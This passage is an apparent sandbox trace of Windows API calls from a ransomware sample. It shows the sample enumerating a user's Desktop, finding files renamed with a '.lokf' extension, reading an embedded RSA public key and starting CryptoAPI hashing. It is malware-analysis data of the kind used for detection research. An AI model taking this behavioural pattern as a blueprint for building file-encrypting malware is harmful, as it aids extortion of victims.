dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b852ad0, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0xac0c5a10, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0x20065e90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa592, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6NumCnon.pps.lokf", cAlternateFileName="6NUMCN~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6NumCnon.pps.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d06ee0, ftCreationTime.dwHighDateTime=0x1d4d402, ftLastAccessTime.dwLowDateTime=0x35623c00, ftLastAccessTime.dwHighDateTime=0x1d4d48b, ftLastWriteTime.dwLowDateTime=0x20065e90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa5a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Ky0ltRrnhjM32N.png.lokf", cAlternateFileName="8KY0LT~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8Ky0ltRrnhjM32N.png.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb8c420, ftCreationTime.dwHighDateTime=0x1d4cf8f, ftLastAccessTime.dwLowDateTime=0x808bf300, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x2008bff0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xaf53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XYY enP9O0YVVimx1.mp3.lokf", cAlternateFileName="8XYYEN~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8XYY enP9O0YVVimx1.mp3.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb9af730, ftCreationTime.dwHighDateTime=0x1d4d0ac, ftLastAccessTime.dwLowDateTime=0xa1b0df30, ftLastAccessTime.dwHighDateTime=0x1d4d1eb, ftLastWriteTime.dwLowDateTime=0x200b2150, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1607a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Md r.swf.lokf", cAlternateFileName="9MDRSW~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Md r.swf.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74880ca0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0x172abcb0, ftLastAccessTime.dwHighDateTime=0x1d4d39d, ftLastWriteTime.dwLowDateTime=0x200b2150, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1248b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9REu6C.m4a.lokf", cAlternateFileName="9REU6C~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9REu6C.m4a.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384de1e0, ftCreationTime.dwHighDateTime=0x1d4cad5, ftLastAccessTime.dwLowDateTime=0x98131ff0, ftLastAccessTime.dwHighDateTime=0x1d4c576, ftLastWriteTime.dwLowDateTime=0x200d82b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x6a0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aRT3ou.jpg.lokf", cAlternateFileName="ART3OU~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRT3ou.jpg.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b11c220, ftCreationTime.dwHighDateTime=0x1d4d570, ftLastAccessTime.dwLowDateTime=0xa72b1130, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0x200fe410, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf929, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bSgKDO2SM-AQU.mp3.lokf", cAlternateFileName="BSGKDO~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bSgKDO2SM-AQU.mp3.lokf") returned=".lokf" [0146.876] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.876] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92bd4f20, ftCreationTime.dwHighDateTime=0x1d4cc7f, ftLastAccessTime.dwLowDateTime=0x947af260, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0x20124570, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x108f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cxkxIuDq.m4a.lokf", cAlternateFileName="CXKXIU~1.LOK")) returned 1 [0146.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cxkxIuDq.m4a.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557a36c0, ftCreationTime.dwHighDateTime=0x1d4d2ea, ftLastAccessTime.dwLowDateTime=0xcaaf2bb0, ftLastAccessTime.dwHighDateTime=0x1d4d54e, ftLastWriteTime.dwLowDateTime=0x20124570, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5974, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="faub8t.flv.lokf", cAlternateFileName="FAUB8T~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\faub8t.flv.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa128e0, ftCreationTime.dwHighDateTime=0x1d4c969, ftLastAccessTime.dwLowDateTime=0x54f95d30, ftLastAccessTime.dwHighDateTime=0x1d4cc77, ftLastWriteTime.dwLowDateTime=0x2014a6d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc498, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FhecmqmUmuGofO.jpg.lokf", cAlternateFileName="FHECMQ~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FhecmqmUmuGofO.jpg.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6564ae30, ftCreationTime.dwHighDateTime=0x1d4c674, ftLastAccessTime.dwLowDateTime=0x4d1e2720, ftLastAccessTime.dwHighDateTime=0x1d4c534, ftLastWriteTime.dwLowDateTime=0x20170830, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FqC7oKr9X-T-xlLzFbdd.jpg.lokf", cAlternateFileName="FQC7OK~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FqC7oKr9X-T-xlLzFbdd.jpg.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c601c50, ftCreationTime.dwHighDateTime=0x1d4d53c, ftLastAccessTime.dwLowDateTime=0xb3f380, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0x20170830, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbb22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gRPeD.m4a.lokf", cAlternateFileName="GRPEDM~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gRPeD.m4a.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf479ec30, ftCreationTime.dwHighDateTime=0x1d4c998, ftLastAccessTime.dwLowDateTime=0x28ff8720, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0x20196990, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1234e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H 5zj6wBswdjjTMij-.mp3.lokf", cAlternateFileName="H5ZJ6W~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H 5zj6wBswdjjTMij-.mp3.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88bab7e0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0xedf42820, ftLastAccessTime.dwHighDateTime=0x1d4c8a4, ftLastWriteTime.dwLowDateTime=0x201bcaf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc662, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h5XCQ.mkv.lokf", cAlternateFileName="H5XCQM~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h5XCQ.mkv.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f64460, ftCreationTime.dwHighDateTime=0x1d4d280, ftLastAccessTime.dwLowDateTime=0x8c733cb0, ftLastAccessTime.dwHighDateTime=0x1d4cb58, ftLastWriteTime.dwLowDateTime=0x201bcaf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I9YVy1.mp3.lokf", cAlternateFileName="I9YVY1~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I9YVy1.mp3.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150300c0, ftCreationTime.dwHighDateTime=0x1d4c8d3, ftLastAccessTime.dwLowDateTime=0xd492d060, ftLastAccessTime.dwHighDateTime=0x1d4d2d7, ftLastWriteTime.dwLowDateTime=0x201e2c50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb0b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IiDoDihC33qoyQYC.avi.lokf", cAlternateFileName="IIDODI~1.LOK")) returned 1 [0146.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IiDoDihC33qoyQYC.avi.lokf") returned=".lokf" [0146.877] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.877] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc4e13d0, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0x7e00560, ftLastAccessTime.dwHighDateTime=0x1d4c922, ftLastWriteTime.dwLowDateTime=0x20208db0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x3e2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jJW2khyR pNShGfzK.flv.lokf", cAlternateFileName="JJW2KH~1.LOK")) returned 1 [0146.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jJW2khyR pNShGfzK.flv.lokf") returned=".lokf" [0146.878] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x782ef0 | out: hHeap=0x6e0000) returned 1 [0146.878] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf0f40, ftCreationTime.dwHighDateTime=0x1d4ca66, ftLastAccessTime.dwLowDateTime=0x62315280, ftLastAccessTime.dwHighDateTime=0x1d4c93b, ftLastWriteTime.dwLowDateTime=0x20208db0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9773, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MKAZ57ez4L.mp3.lokf", cAlternateFileName="MKAZ57~1.LOK")) returned 1 [0146.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MKAZ57ez4L.mp3.lokf") returned=".lokf" [0146.878] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.878] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcebe94b0, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0xdff02520, ftLastAccessTime.dwHighDateTime=0x1d4d2c3, ftLastWriteTime.dwLowDateTime=0x2022ef10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NPYvWKI6z.rtf.lokf", cAlternateFileName="NPYVWK~1.LOK")) returned 1 [0146.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NPYvWKI6z.rtf.lokf") returned=".lokf" [0146.878] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.878] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NxkfKpMd", cAlternateFileName="")) returned 1 [0146.878] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38f90f90, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0x4ada5fa0, ftLastAccessTime.dwHighDateTime=0x1d4d340, ftLastWriteTime.dwLowDateTime=0x2022ef10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1ece, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oQo1_q.jpg.lokf", cAlternateFileName="OQO1_Q~1.LOK")) returned 1 [0146.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oQo1_q.jpg.lokf") returned=".lokf" [0146.878] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x740aa8 | out: hHeap=0x6e0000) returned 1 [0146.878] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fa2ba0, ftCreationTime.dwHighDateTime=0x1d4cb6a, ftLastAccessTime.dwLowDateTime=0x4591d900, ftLastAccessTime.dwHighDateTime=0x1d4d0f8, ftLastWriteTime.dwLowDateTime=0x20255070, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2203, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OvPRD3iWK.png.lokf", cAlternateFileName="OVPRD3~1.LOK")) returned 1 [0146.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OvPRD3iWK.png.lokf") returned=".lokf" [0146.878] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x742b00 | out: hHeap=0x6e0000) returned 1 [0146.878] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3325580, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x3325580, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1689200, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb7e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="penelop0611_2019-11-06_10-30.exe_.exe", cAlternateFileName="PENELO~1.EXE")) returned 1 [0146.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned=".exe" [0146.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0146.878] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x391fb40 | out: lpFileSize=0x391fb40*=753152) returned 1 [0146.878] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c60000 [0146.880] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xb7dda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.880] ReadFile (in: hFile=0x620, lpBuffer=0x3c60000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x391fb78, lpOverlapped=0x0 | out: lpBuffer=0x3c60000*, lpNumberOfBytesRead=0x391fb78*=0x26, lpOverlapped=0x0) returned 1 [0146.882] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.882] ReadFile (in: hFile=0x620, lpBuffer=0x3c60000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x391fb70, lpOverlapped=0x0 | out: lpBuffer=0x3c60000*, lpNumberOfBytesRead=0x391fb70*=0x25805, lpOverlapped=0x0) returned 1 [0146.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0146.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0146.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0146.884] CryptAcquireContextW (in: phProv=0x391fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x391fa50*=0x742b00) returned 1 [0146.885] CryptCreateHash (in: hProv=0x742b00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x391fa58 | out: phHash=0x391fa58) returned 1 [0146.885] CryptHashData (hHash=0x3220d98, pbData=0x32429c0, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0146.885] CryptGetHashParam (in: hHash=0x3220d98, dwParam=0x2, pbData=0x0, pdwDataLen=0x391fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x391fa54) returned 1 [0146.885] CryptGetHashParam (in: hHash=0x3220d98, dwParam=0x2, pbData=0x31ee480, pdwDataLen=0x391fa54, dwFlags=0x0 | out: pbData=0x31ee480, pdwDataLen=0x391fa54) returned 1 [0146.885] GetLastError () returned 0x0 [0146.885] SetLastError (dwErrCode=0x0) [0146.885] GetLastError () returned 0x0 [0146.885] SetLastError (dwErrCode=0x0) [0146.885] GetLastError () returned 0x0 [0146.885] SetLastError (dwErrCode=0x0) [0146.885] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] GetLastError () returned 0x0 [0146.886] SetLastError (dwErrCode=0x0) [0146.886] CryptDestroyHash 